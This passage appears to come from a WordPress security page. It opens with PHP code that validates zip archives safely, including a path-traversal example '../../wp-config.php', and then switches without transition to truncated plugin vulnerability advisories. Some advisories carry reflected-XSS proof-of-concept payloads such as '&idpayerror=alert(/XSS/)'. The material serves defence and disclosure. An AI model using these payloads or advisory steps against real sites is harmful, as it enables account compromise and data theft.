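function demo_import_settings_archive( $zip_path, $allowed_ext = array( 'json', 'css', 'txt' ) ) {
    WP_Filesystem();
    $scratch = trailingslashit( get_temp_dir() ) . 'demo-import-' . wp_generate_password( 12, false );
    if ( ! wp_mkdir_p( $scratch ) ) {
        return new WP_Error( 'mkdir', 'cannot create scratch directory' );
    }
    $result = unzip_file( $zip_path, $scratch );
    if ( is_wp_error( $result ) ) {
        return $result;
    }
    $files = demo_import_list_files( $scratch );
    if ( false === $files ) {
        return new WP_Error( 'symlink', 'archive contains a symlink' );
    }
    foreach ( $files as $file ) {
        $ext = strtolower( pathinfo( $file, PATHINFO_EXTENSION ) );
        // The allowlist is the real control; the name denylist is defence in depth for the
        // day someone widens $allowed_ext.
        if ( demo_import_is_dangerous_name( $file ) || ! in_array( $ext, $allowed_ext, true ) ) {
            return new WP_Error( 'rejected', 'disallowed file in archive: ' . basename( $file ) );
        }
    }
    return $files;
}
```

Two things are deliberately left to the caller: removing the scratch directory on every exit path, and copying accepted files with fixed destination names rather than the names from the archive, so a zip entry of ../../wp-config.php cannot choose where it lands. Extracting under get_temp_dir() rather than under wp-content/uploads is what makes the window between extraction and validation harmless even if validation later fails.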
Booked < 2.2.6 - Broken Authentication to Export Users Data in CSV
The plugin allows users to book an appointment by providing their PII such as email, name, phone number and personal message. The vulnerability allows anyone to dump all records of users and their appointment details in CSV as an unauthenticated user. The user also gets registered as a WP user after...
DW Question & Answer Pro <= 1.3.4 - Arbitrary Comment Edit via IDOR
The plugin does not check that the comment to edit belongs to the user making the request, allowing any user to edit other users' comments. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified numerous times since. As any authenticated user, post a...
IDPay for Contact Form 7 <= 2.1.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the idpayerror parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. Append the following payload on a page where a form with an IDPay payment interface is embedded: &idpayerror=alert(/XSS/) Example:...
Ad Invalid Click Protector (AICP) < 1.2.7 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting: alert(/XSS/)' /...
Shopping Cart & eCommerce Store < 5.2.5 - Arbitrary Design Settings Update via CSRF
The plugin is lacking CSRF checks in various AJAX actions, such as ecadminajaxsavedesignsettings, which could allow attackers to make a logged in admin update arbitrary settings, for example to disable the Live Design Editor, or to set the custom CSS setting to body { background-color: red; }...
PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise
The plugin does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role, and make any...
Page View Counts < 2.4.9 - Contributor+ Stored XSS
The plugin does not escape the postid parameter of the pvcstats shortcode, allowing users with a role as low as Contributor to perform Stored XSS attacks. A post made by a contributor would still have to be approved by an admin for the XSS to trigger in the frontend; however, higher privilege user...